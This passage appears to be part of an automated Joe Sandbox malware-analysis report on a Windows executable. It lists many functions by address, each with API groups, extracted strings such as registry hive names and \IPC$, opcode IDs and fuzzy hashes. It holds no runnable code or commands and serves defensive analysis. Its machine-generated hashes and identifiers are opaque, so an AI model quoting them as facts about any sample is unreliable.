                                                                                • Instruction Fuzzy Hash: 56027432A08A828AE7B8BB75C0559FCA361FF54B44F854535CA0E47B94DF3DE560E3A0
                                                                                Function 00007FF79F8F8BF4 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectoryTime$File$Localwcscat$Systemwcscpy
                                                                                • String ID: *.*
                                                                                • API String ID: 1111067124-438819550
                                                                                • Opcode ID: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
                                                                                • Instruction ID: 93e40b72deefb6c687c6628cd8b5ffa8726be9d0381885d6fa744b5524b94c89
                                                                                • Opcode Fuzzy Hash: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
                                                                                • Instruction Fuzzy Hash: 85718F32618BC695DBA0EF32D8405EAB320FB94B88F801031DA4E47765DF3DE56AD750
                                                                                Function 00007FF79F904F54 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 151windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                • String ID:
                                                                                • API String ID: 2598888154-3916222277
                                                                                • Opcode ID: dea97f0d0ad0f9214e770fe855ba7d83dc888621a1f275c7b89ba2b07fbcc766
                                                                                • Instruction ID: 0bd7f56fd6bedd57aacb8f9f15256b5443ee191c69558ef03b74f05924a928ab
                                                                                • Opcode Fuzzy Hash: dea97f0d0ad0f9214e770fe855ba7d83dc888621a1f275c7b89ba2b07fbcc766
                                                                                • Instruction Fuzzy Hash: C3517776B15680CBE760DF75E844AADB7B1F748B98F408125EE4997B18CF38E4158B10
                                                                                Function 00007FF79F8DB0C4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                • String ID: NULL Pointer assignment
                                                                                • API String ID: 2706829360-2785691316
                                                                                • Opcode ID: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                                • Instruction ID: 4b4f168176793211fb1daabe52bdb024a8e8c6ece22c2c46ca7f6035cc5808b2
                                                                                • Opcode Fuzzy Hash: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                                • Instruction Fuzzy Hash: 77517122B15A9289EB50EF71D880AFC6374FF84B99F814032DE0E8B659DF78D045C350
                                                                                Function 00007FF79F911110 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 371COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF79F90FD7B), ref: 00007FF79F911143
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper
                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                • API String ID: 3964851224-909552448
                                                                                • Opcode ID: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                                • Instruction ID: d8ee71e29e400b7adb844d624a7d084991174c049c8cbc77f4c9a975c0b48b64
                                                                                • Opcode Fuzzy Hash: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                                • Instruction Fuzzy Hash: 23E18112B08AD795EA70EB7598402F8A394BB50BA8BC44531C91DC77DCEE3CE9968320
                                                                                Function 00007FF79F8F87CC Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 200COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectory$AttributesFilewcscat$wcscpy
                                                                                • String ID: *.*
                                                                                • API String ID: 4125642244-438819550
                                                                                • Opcode ID: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                                                • Instruction ID: f3158d1ce8b417f36cee216409f026944fdcacef534282f94f9804b50a04910e
                                                                                • Opcode Fuzzy Hash: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                                                • Instruction Fuzzy Hash: 2281B022B28AC28AEBA0EF21D941AFDA360FB54B84FC00036DA4E47794DF7CD565D750
                                                                                Function 00007FF79F8F3268 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: LoadStringwprintf
                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                • API String ID: 3297454147-3080491070
                                                                                • Opcode ID: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                                                • Instruction ID: 569c26e4a147c439543ee5f5337630b5f8873bad6fdde5e10aa507de67fbc93f
                                                                                • Opcode Fuzzy Hash: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                                                • Instruction Fuzzy Hash: 61617221B18AD296EB60FB30D841AECA360FBA4754FC00032EA5D57B99DF7CE556C760
                                                                                Function 00007FF79F8E74B0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 128windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadModuleString$Messagewprintf
                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                • API String ID: 4051287042-2268648507
                                                                                • Opcode ID: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                                                • Instruction ID: f3deb9552e162f0c53f7a1fe4f3b21d4888de116b918209d485c1e8c756420e2
                                                                                • Opcode Fuzzy Hash: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                                                • Instruction Fuzzy Hash: EC51C021B28AD291EB60FB30E8419EDA361FF94754BC00032E92D57B9ADF7CE556C750
                                                                                Function 00007FF79F8ED4AC Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 65sleepwindowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Window$CurrentMessageProcessSendSleep$ActiveAttachDialogEnumFindInputTimeWindowstime
                                                                                • String ID: BUTTON
                                                                                • API String ID: 3935177441-3405671355
                                                                                • Opcode ID: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                                • Instruction ID: 8651f864c80a7bdb7909e3258378474b570db1c79c6c67dd01e2728d8dc86e4a
                                                                                • Opcode Fuzzy Hash: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                                • Instruction Fuzzy Hash: 70315025E0DAC782FB70BB34EC54BF5A3519F84768FC55031D90E8A6A8DE2CA4999730
                                                                                Function 00007FF79F8715EC Relevance: 18.2, APIs: 12, Instructions: 191timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 1974058525-0
                                                                                • Opcode ID: 0c1613d7862a27f9aadcde1ff47aecba04f14ac792f66c26bb2ef633a4b89113
                                                                                • Instruction ID: 7dbcf712677bb396b3b34af2e76d1ab529dd0c6d642c82815cca83e98bdeee00
                                                                                • Opcode Fuzzy Hash: 0c1613d7862a27f9aadcde1ff47aecba04f14ac792f66c26bb2ef633a4b89113
                                                                                • Instruction Fuzzy Hash: 9D915121A09A8685EBB4BF35D490BF9A360BF44B94FD84531C94E87769CF3CE4A59320
                                                                                Function 00007FF79F8E2F78 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                • String ID:
                                                                                • API String ID: 3096461208-0
                                                                                • Opcode ID: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                                                • Instruction ID: b6204087e9d733b361aa81e64c7db4457109762037a8bad57d06dbf5645f9233
                                                                                • Opcode Fuzzy Hash: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                                                • Instruction Fuzzy Hash: DB618272F046819BE764DF79D844AACBBA2B788B94F508139DE0997F58DF3CD9058B00
                                                                                Function 00007FF79F8DFF44 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 243windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                                • String ID: %s%u
                                                                                • API String ID: 1412819556-679674701
                                                                                • Opcode ID: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                                                • Instruction ID: 1797e1262d0715da16648895bc2f0b08fc4a2e367493508909d3829555dbeea6
                                                                                • Opcode Fuzzy Hash: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                                                • Instruction Fuzzy Hash: A1B1CD72B286C296EBA9AB35D804BF9A7A0FB44B84F800431CA1947785DF3DE565D720
                                                                                Function 00007FF79F8E176C Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 226COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ClassName$Window$Text$BuffCharRectUpperwcsstr
                                                                                • String ID: ThumbnailClass
                                                                                • API String ID: 4010642439-1241985126
                                                                                • Opcode ID: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                                                • Instruction ID: 3b34b317a20e672b0f139aec3f30beb64f31b6c4a713a10dbc22760c2ef03e85
                                                                                • Opcode Fuzzy Hash: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                                                • Instruction Fuzzy Hash: 25A18122B08AC242EBB4BB35D444BF9E761FB85794FC04035CA8E43A95DE3DE955DB10
                                                                                Function 00007FF79F871504 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 163windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                • String ID: P
                                                                                • API String ID: 1268354404-3110715001
                                                                                • Opcode ID: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                                • Instruction ID: 80151a4d1eafaca3c477766ea2dcab806cd6d399e4e07017a61ed859618eaa2e
                                                                                • Opcode Fuzzy Hash: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                                • Instruction Fuzzy Hash: 5F61C735A08A828AEBB4EF35D850AF9A750FF84BA8F940535DD0E47B68DF3CE4549710
                                                                                Function 00007FF79F8F34E4 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 149COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: LoadStringwprintf
                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                • API String ID: 3297454147-2391861430
                                                                                • Opcode ID: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
                                                                                • Instruction ID: 5ca4245e10c9a507c5200816055079dea465b3ec31631748d841b91b6e8b931e
                                                                                • Opcode Fuzzy Hash: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
                                                                                • Instruction Fuzzy Hash: 8671BF22B28AC296EBA0FB71E8419EDA360FB94754FC00032EA1D47799DF3CE556D750
                                                                                Function 00007FF79F8DC034 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 124registryshareCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                • API String ID: 3030280669-22481851
                                                                                • Opcode ID: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                                • Instruction ID: 882afae09caf857693831e2d5a88c73c4b50fb3a13b7179354b824ccfd60d9d4
                                                                                • Opcode Fuzzy Hash: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                                • Instruction Fuzzy Hash: 9B51A422618AC295EB60FB75E894AEDA7A0FF94394F800031EA4D47B79DF3CD595C710
                                                                                Function 00007FF79F91AD1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                                                • String ID: static
                                                                                • API String ID: 3821898125-2160076837
                                                                                • Opcode ID: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
                                                                                • Instruction ID: 72506e6076c063b5d9f016aa831adbfebfa1d5197d571fec8112f5bdc9c51728
                                                                                • Opcode Fuzzy Hash: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
                                                                                • Instruction Fuzzy Hash: A4413F36618BC18BE770EF25A84479AB361FB897A0F904235DA9D87B98CF3CD445CB10
                                                                                Function 00007FF79F8F3E20 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 97fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                                • String ID: :$\$\??\%s
                                                                                • API String ID: 3827137101-3457252023
